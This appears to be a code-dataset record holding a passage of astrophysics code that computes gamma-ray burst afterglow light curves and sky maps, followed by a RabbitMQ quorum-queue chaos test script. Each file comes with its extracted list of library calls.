calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
Tfil = self.TTs[:,-1]== max(self.TTs[:,-1])
max_Tobs = self.RRs[Tfil, -1]/(self.Betas[Tfil,-1]*cts.cc) * (1.-self.Betas[Tfil,-1]*cos(max(alpha)))
#max_Tobs_oa = max(self.TTs[:,-1])
#max_Tobs = max(obsTime_offAxis(self, self.RRs, self.TTs[:,alpha==max(alpha)][:,0], max(alpha)))/cts.sTd
if ttf>max_Tobs:
print("ttf larger than maximum observable time. Adjusting value. ")
ttf = max_Tobs
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
for ii in tqdm(range(self.ncells)):
#for ii in range(self.ncells):
ttobs = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii])
RRs = self.RRs[:,ii]
filTM = where(tts<=max(ttobs))[0]
filTm = where(tts[filTM]>=min(ttobs))[0]
filTM_cj = where(tts<=max(ttobs))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs))[0]
Rint = interp1d(ttobs, RRs)
Gamint = interp1d(RRs, self.Gams[:,ii])
Robs = Rint(tts[filTM][filTm])
GamObs = Gamint(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
onAxisTobs = dopFacs*tts[filTM][filTm]
# Forward shock stuff
Bfield = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs
gamMobs, nuMobs = minGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
gamCobs, nuCobs = critGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Fnuobs = fluxMax(Robs, GamObs, self.nn, Bfield, self.DD)
#Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = self.params_tt_RS(onAxisTobs, ii, Rb)
# Counter jet stuff
ttobs_cj = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha_cj[ii])
filTM_cj = where(tts<=max(ttobs_cj))[0]
filTm_cj = where(tts[filTM]>=min(ttobs_cj))[0]
Rint_cj = interp1d(ttobs_cj, RRs)
#Gamint = interp1d(RRs, self.Gams[:,ii])
Robs_cj = Rint(tts[filTM_cj][filTm_cj])
GamObs_cj = Gamint(Robs_cj)
if len(GamObs_cj)==0: continue
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
afac_cj = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
onAxisTobs_cj = dopFacs_cj*tts[filTM_cj][filTm_cj]
Bfield_cj = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs_cj
gamMobs_cj, nuMobs_cj = minGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj)
gamCobs_cj, nuCobs_cj = critGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD)
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
freqs_cj = freq/dopFacs_cj
#print shape(freqs), shape(freqs[fil1]), shape(nuMobs[fil1]), shape(nuCobs[fil1]), shape(Fnuobs[fil1]), shape(afac[fil1]), shape(calpha)
#print shape(light_curve[obsFreqs==freq, filT]), shape([fil1])
#print fil1
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
afac[fil1] * dopFacs[fil1]**3. * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
afac[fil3] * dopFacs[fil3]**3. * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
afac_cj[fil5] * dopFacs_cj[fil5]**3. * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))*calpha_cj[ii]
return tts, light_curve, light_curve_RS, light_curve_CJ
#return tts, 2.*light_curve, 2.*light_curve_RS
def light_curve_peer(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
# Obserer angle for the counter-jet
calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
Tfil = self.TTs[:,-1]== max(self.TTs[:,-1])
max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs[:,-1], max(alpha)))
if ttf>max_Tobs:
print("ttf larger than maximum observable time. Adjusting value.")
ttf = max_Tobs
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
RRs = self.RRs
for ii in tqdm(range(self.ncells)):
ttobs = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii])
filTM = where(tts<=max(ttobs))[0]
filTm = where(tts[filTM]>=min(ttobs))[0]
Rint = interp1d(ttobs, RRs)
Gamint = interp1d(RRs, self.Gams[:,ii])
Robs = Rint(tts[filTM][filTm])
GamObs = Gamint(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
if len(GamObs)==0: continue
onAxisTint = interp1d(RRs, self.TTs[:,ii])
#onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs = onAxisTint(Robs)
#Bfield = sqrt(32.*pi*cts.mp*self.nn*self.epB*GamObs*(GamObs-1.))*cts.cc
#gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
#gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Bfield = Bfield_modified(GamObs, BetaObs, self.nn, self.epB)
gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, self.Xp)
gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
#nuMobs, nuCobs = GamObs*nuMobs, GamObs*nuCobs
Fnuobs = fluxMax_modified(Robs, GamObs, self.nn, Bfield, self.DD, self.PhiP)
#Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = self.params_tt_RS(onAxisTobs, ii, Rb)
dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
# Counter jet stuff
ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha_cj[ii])
filTM_cj = where(tts<=max(ttobs_cj))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs_cj))[0]
Rint_cj = interp1d(ttobs_cj, RRs)
#Gamint = interp1d(RRs, self.Gams[:,ii])
Robs_cj = Rint(tts[filTM_cj][filTm_cj])
GamObs_cj = Gamint(Robs_cj)
if len(GamObs_cj)==0: continue
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
onAxisTobs_cj = onAxisTint(Robs_cj)
Bfield_cj = Bfield_modified(GamObs_cj, BetaObs_cj, self.nn, self.epB)
gamMobs_cj, nuMobs_cj = minGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, self.Xp)
gamCobs_cj, nuCobs_cj = critGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax_modified(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD, self.PhiP)
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
#nuMobs = nuMobs/dopFacs
#nuCobs = nuCobs/dopFacs
#nuMobs_cj = nuMobs_cj/dopFacs_cj
#nuCobs_cj = nuCobs_cj/dopFacs_cj
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
self.cellSize*(GamObs[fil1]*(1.-BetaObs[fil1]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))#*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# (GamObs[fil2]*(1.-BetaObs[fil2]*calpha[fil2][ii]))**(-3.) * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))#*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
self.cellSize*(GamObs[fil3]*(1.-BetaObs[fil3]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))#*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# (GamObs[fil4]*(1.-BetaObs[fil4]*calpha[fil4][ii]))**(-3.)* FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))#*calpha[ii]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs_cj = freq/dopFacs_cj
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
self.cellSize*(GamObs_cj[fil5]*(1.-BetaObs_cj[fil5]*calpha_cj[ii]))**(-3.) * FluxNuSC_arr(self,
nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))#*calpha[ii]
return tts, light_curve, light_curve_RS, light_curve_CJ
#return tts, 2.*light_curve, 2.*light_curve_RS
def lightCurve_interp(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if self.evolution == "adiabatic":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_adiabatic(theta_obs, obsFreqs, tt0, ttf, num, Rb)
elif self.evolution == "peer":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_peer(theta_obs, obsFreqs, tt0, ttf, num, Rb)
return tts, light_curve, light_curve_RS, light_curve_CJ
def skymap(self, theta_obs, tt_obs, freq, nx, ny, xx0, yy0):
calpha = zeros([2*self.ncells])
alpha = zeros([2*self.ncells])
calpha[:self.ncells] = self.obsangle(theta_obs)
calpha[self.ncells:] = self.obsangle_cj(theta_obs)
alpha = arccos(calpha)
TTs, RRs, Gams, Betas = zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells)
#nuMs, nuCs, fluxes = zeros(2.*self.ncells), zeros(2.*self.ncells), zeros(2.*self.ncells)
fluxes = zeros(2*self.ncells)
im_xxs, im_yys = zeros(2*self.ncells), zeros(2*self.ncells)
im_xxs[:self.ncells] = -1.*cos(theta_obs)*sin(self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(self.cthetas)
im_yys[:self.ncells] = sin(self.cthetas)*cos(self.cphis)
im_xxs[self.ncells:] = -1.*cos(theta_obs)*sin(pi-self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(pi-self.cthetas)
im_yys[self.ncells:] = sin(pi-self.cthetas)*cos(self.cphis)
if self.evolution == 'adiabatic':
for ii in tqdm(range(self.ncells)):
Tint = interp1d(self.RRs[:,ii], self.TTs[:,ii])
ttobs = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii])
ttobs_cj = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii+self.ncells])
Rint = interp1d(ttobs, self.RRs[:,ii])
Rint_cj = interp1d(ttobs_cj, self.RRs[:,ii])
RRs[ii] = Rint(tt_obs)
RRs[ii+self.ncells] = Rint_cj(tt_obs)
TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
GamInt = interp1d(self.RRs[:,ii], self.Gams[:,ii])
Gams[ii], Gams[ii+self.ncells] = GamInt(RRs[ii]), GamInt(RRs[ii+self.ncells])
Betas = sqrt(1.-Gams**(-2.))
Bf = (32.*pi*self.nn*self.epB*cts.mp)**(1./2.) * Gams*cts.cc
gamM, nuM = minGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf)
gamC, nuC = critGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
flux = fluxMax(RRs, Gams, self.nn, Bf, self.DD)
#fluxMax[Gams<=2] = 0.
dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
afac = self.cellSize/maximum(self.cellSize, 2.*pi*(1.-cos(1./Gams)))
obsFreqs = freq/dopFacs
fluxes = (self.DD**2./(abs(calpha)*self.cellSize*RRs**2.)) * afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
elif self.evolution == 'peer':
for ii in tqdm(range(self.ncells)):
Tint = interp1d(self.RRs, self.TTs[:,ii])
ttobs = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii])
ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii+self.ncells])
Rint, Rint_cj = interp1d(ttobs, self.RRs), interp1d(ttobs_cj, self.RRs)
RRs[ii], RRs[ii+self.ncells] = Rint(tt_obs), Rint_cj(tt_obs)
TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
GamInt = interp1d(self.RRs, self.Gams[:,ii])
Gams[ii], Gams[ii+self.ncells] = GamInt(RRs[ii]), GamInt(RRs[ii+self.ncells])
Betas = sqrt(1.-Gams**(-2.))
Bf = Bfield_modified(Gams, Betas, self.nn, self.epB)
gamM, nuM = minGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
gamC, nuC = critGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
flux = fluxMax_modified(RRs, Gams, self.nn, Bf, self.DD, self.PhiP)
#fluxMax[Gams<=5] = 0.
#nuM, nuC = nuM/Gams, nuC/Gams
dopFacs = self.dopplerFactor(calpha, Betas)
obsFreqs = freq/dopFacs
#afac = self.cellSize/maximum(self.cellSize*ones(self.ncells), 2.*pi*(1.-cos(1./Gams)))
fluxes = (self.DD**2./(abs(calpha)*self.cellSize*RRs**2.)) *self.cellSize* (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
#fluxes = (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fluxMax, obsFreqs)*1./calpha
fluxes2 = self.cellSize*(Gams*(1.-Betas*calpha))**(-3.)*FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
im_xxs = RRs*im_xxs
im_yys = RRs*im_yys
return im_xxs, im_yys, fluxes, fluxes2, RRs, Gams, calpha, TTs
|
[
"scipy.interpolate.interp1d",
"tqdm.tqdm"
] |
[((7054, 7082), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (7062, 7082), False, 'from scipy.interpolate import interp1d\n'), ((7511, 7536), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (7519, 7536), False, 'from scipy.interpolate import interp1d\n'), ((8503, 8531), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (8511, 8531), False, 'from scipy.interpolate import interp1d\n'), ((13425, 13453), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (13433, 13453), False, 'from scipy.interpolate import interp1d\n'), ((13975, 14000), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (13983, 14000), False, 'from scipy.interpolate import interp1d\n'), ((14443, 14471), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (14451, 14471), False, 'from scipy.interpolate import interp1d\n'), ((20092, 20120), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (20100, 20120), False, 'from scipy.interpolate import interp1d\n'), ((20144, 20157), 'tqdm.tqdm', 'tqdm', (['indices'], {}), '(indices)\n', (20148, 20157), False, 'from tqdm import tqdm\n'), ((37759, 37779), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'RRs'], {}), '(ttobs, RRs)\n', (37767, 37779), False, 'from scipy.interpolate import interp1d\n'), ((37806, 37837), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.Gams[:, ii]'], {}), '(RRs, self.Gams[:, ii])\n', (37814, 37837), False, 'from scipy.interpolate import interp1d\n'), ((39053, 39076), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'RRs'], {}), '(ttobs_cj, RRs)\n', (39061, 39076), False, 'from scipy.interpolate import interp1d\n'), ((44192, 44212), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'RRs'], {}), '(ttobs, RRs)\n', (44200, 44212), False, 'from scipy.interpolate import interp1d\n'), ((44239, 44270), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.Gams[:, ii]'], {}), '(RRs, self.Gams[:, ii])\n', (44247, 44270), False, 'from scipy.interpolate import interp1d\n'), ((44484, 44514), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.TTs[:, ii]'], {}), '(RRs, self.TTs[:, ii])\n', (44492, 44514), False, 'from scipy.interpolate import interp1d\n'), ((45926, 45949), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'RRs'], {}), '(ttobs_cj, RRs)\n', (45934, 45949), False, 'from scipy.interpolate import interp1d\n'), ((20398, 20423), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (20406, 20423), False, 'from scipy.interpolate import interp1d\n'), ((20451, 20479), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (20459, 20479), False, 'from scipy.interpolate import interp1d\n'), ((21641, 21669), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (21649, 21669), False, 'from scipy.interpolate import interp1d\n'), ((51083, 51125), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.TTs[:, ii]'], {}), '(self.RRs[:, ii], self.TTs[:, ii])\n', (51091, 51125), False, 'from scipy.interpolate import interp1d\n'), ((51387, 51419), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs[:, ii]'], {}), '(ttobs, self.RRs[:, ii])\n', (51395, 51419), False, 'from scipy.interpolate import interp1d\n'), ((51450, 51485), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs[:, ii]'], {}), '(ttobs_cj, self.RRs[:, ii])\n', (51458, 51485), False, 'from scipy.interpolate import interp1d\n'), ((51719, 51762), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.Gams[:, ii]'], {}), '(self.RRs[:, ii], self.Gams[:, ii])\n', (51727, 51762), False, 'from scipy.interpolate import interp1d\n'), ((26684, 26723), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:]', 'self.Gams[:, ii]'], {}), '(self.RRs[:], self.Gams[:, ii])\n', (26692, 26723), False, 'from scipy.interpolate import interp1d\n'), ((52763, 52798), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs[:, ii]'], {}), '(self.RRs, self.TTs[:, ii])\n', (52771, 52798), False, 'from scipy.interpolate import interp1d\n'), ((53303, 53339), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.Gams[:, ii]'], {}), '(self.RRs, self.Gams[:, ii])\n', (53311, 53339), False, 'from scipy.interpolate import interp1d\n'), ((21929, 21954), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (21937, 21954), False, 'from scipy.interpolate import interp1d\n'), ((21956, 21984), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (21964, 21984), False, 'from scipy.interpolate import interp1d\n'), ((27300, 27343), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.Gams[:, ii]'], {}), '(self.RRs[:, ii], self.Gams[:, ii])\n', (27308, 27343), False, 'from scipy.interpolate import interp1d\n'), ((53034, 53059), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (53042, 53059), False, 'from scipy.interpolate import interp1d\n'), ((53061, 53089), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (53069, 53089), False, 'from scipy.interpolate import interp1d\n')]
|
#!/usr/bin/env python
import pika
import sys
import time
import datetime
import subprocess
import random
import threading
import requests
import json
from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated
from RabbitPublisher import RabbitPublisher
from MultiTopicConsumer import MultiTopicConsumer
from QueueStats import QueueStats
from ChaosExecutor import ChaosExecutor
from printer import console_out
from MessageMonitor import MessageMonitor
from ConsumerManager import ConsumerManager
from BrokerManager import BrokerManager
def main():
print("quorum-queue-test.py")
args = get_args(sys.argv)
count = -1 # no limit
tests = int(get_mandatory_arg(args, "--tests"))
actions = int(get_mandatory_arg(args, "--actions"))
in_flight_max = int(get_optional_arg(args, "--in-flight-max", 10))
grace_period_sec = int(get_mandatory_arg(args, "--grace-period-sec"))
cluster_size = get_optional_arg(args, "--cluster", "3")
queue = get_mandatory_arg(args, "--queue")
sac_enabled = is_true(get_mandatory_arg(args, "--sac"))
chaos_mode = get_optional_arg(args, "--chaos-mode", "mixed")
chaos_min_interval = int(get_optional_arg(args, "--chaos-min-interval", "30"))
chaos_max_interval = int(get_optional_arg(args, "--chaos-max-interval", "120"))
prefetch = int(get_optional_arg(args, "--pre-fetch", "10"))
rmq_version = get_optional_arg_validated(args, "--rmq-version", "3.8-beta", ["3.7", "3.8-beta", "3.8-alpha"])
for test_number in range(1, tests+1):
print("")
console_out(f"TEST RUN: {str(test_number)} of {tests}--------------------------", "TEST RUNNER")
setup_complete = False
while not setup_complete:
broker_manager = BrokerManager()
broker_manager.deploy(cluster_size, True, rmq_version, False)
initial_nodes = broker_manager.get_initial_nodes()
console_out(f"Initial nodes: {initial_nodes}", "TEST RUNNER")
print_mod = in_flight_max * 5
queue_name = queue + "_" + str(test_number)
mgmt_node = broker_manager.get_random_init_node()
queue_created = False
qc_ctr = 0
while queue_created == False and qc_ctr < 20:
qc_ctr += 1
if sac_enabled:
queue_created = broker_manager.create_quorum_sac_queue(mgmt_node, queue_name, cluster_size, 0)
else:
queue_created = broker_manager.create_quorum_queue(mgmt_node, queue_name, cluster_size, 0)
if queue_created:
setup_complete = True
else:
time.sleep(5)
time.sleep(10)
msg_monitor = MessageMonitor("qqt", test_number, print_mod, True, False)
publisher = RabbitPublisher(1, test_number, broker_manager, in_flight_max, 120, print_mod)
publisher.configure_sequence_direct(queue_name, count, 0, 1)
consumer_manager = ConsumerManager(broker_manager, msg_monitor, "TEST RUNNER", False)
consumer_manager.add_consumers(1, test_number, queue_name, prefetch)
chaos = ChaosExecutor(initial_nodes)
if chaos_mode == "partitions":
chaos.only_partitions()
elif chaos_mode == "nodes":
chaos.only_kill_nodes()
monitor_thread = threading.Thread(target=msg_monitor.process_messages)
monitor_thread.start()
consumer_manager.start_consumers()
pub_thread = threading.Thread(target=publisher.start_publishing)
pub_thread.start()
console_out("publisher started", "TEST RUNNER")
for action_num in range(1, actions+1):
wait_sec = random.randint(chaos_min_interval, chaos_max_interval)
console_out(f"waiting for {wait_sec} seconds before next action", "TEST RUNNER")
time.sleep(wait_sec)
console_out(f"execute chaos action {str(action_num)}/{actions} of test {str(test_number)}", "TEST RUNNER")
chaos.execute_chaos_action()
subprocess.call(["bash", "../cluster/cluster-status.sh"])
time.sleep(60)
console_out("repairing cluster", "TEST RUNNER")
chaos.repair()
console_out("repaired cluster", "TEST RUNNER")
publisher.stop_publishing()
console_out("starting grace period for consumer to catch up", "TEST RUNNER")
ctr = 0
while True:
ms_since_last_msg = datetime.datetime.now() - msg_monitor.get_last_msg_time()
if msg_monitor.get_unique_count() >= publisher.get_pos_ack_count() and len(publisher.get_msg_set().difference(msg_monitor.get_msg_set())) == 0:
break
elif ctr > grace_period_sec and ms_since_last_msg.total_seconds() > 15:
break
time.sleep(1)
ctr += 1
confirmed_set = publisher.get_msg_set()
lost_msgs = confirmed_set.difference(msg_monitor.get_msg_set())
console_out("RESULTS------------------------------------", "TEST RUNNER")
if len(lost_msgs) > 0:
console_out(f"Lost messages count: {len(lost_msgs)}", "TEST RUNNER")
for msg in lost_msgs:
console_out(f"Lost message: {msg}", "TEST RUNNER")
console_out(f"Confirmed count: {publisher.get_pos_ack_count()} Received count: {msg_monitor.get_receive_count()} Unique received: {msg_monitor.get_unique_count()}", "TEST RUNNER")
success = True
if msg_monitor.get_out_of_order() == True:
console_out("FAILED TEST: OUT OF ORDER MESSAGES", "TEST RUNNER")
success = False
if len(lost_msgs) > 0:
console_out("FAILED TEST: LOST MESSAGES", "TEST RUNNER")
success = False
if success == True:
console_out("TEST OK", "TEST RUNNER")
console_out("RESULTS END------------------------------------", "TEST RUNNER")
try:
consumer_manager.stop_all_consumers()
pub_thread.join()
except Exception as e:
console_out("Failed to clean up test correctly: " + str(e), "TEST RUNNER")
console_out(f"TEST {str(test_number)} COMPLETE", "TEST RUNNER")
if __name__ == '__main__':
main()
|
[
"threading.Thread",
"printer.console_out",
"random.randint",
"ConsumerManager.ConsumerManager",
"ChaosExecutor.ChaosExecutor",
"command_args.get_args",
"time.sleep",
"command_args.get_optional_arg",
"BrokerManager.BrokerManager",
"command_args.get_optional_arg_validated",
"subprocess.call",
"MessageMonitor.MessageMonitor",
"command_args.get_mandatory_arg",
"datetime.datetime.now",
"RabbitPublisher.RabbitPublisher"
] |
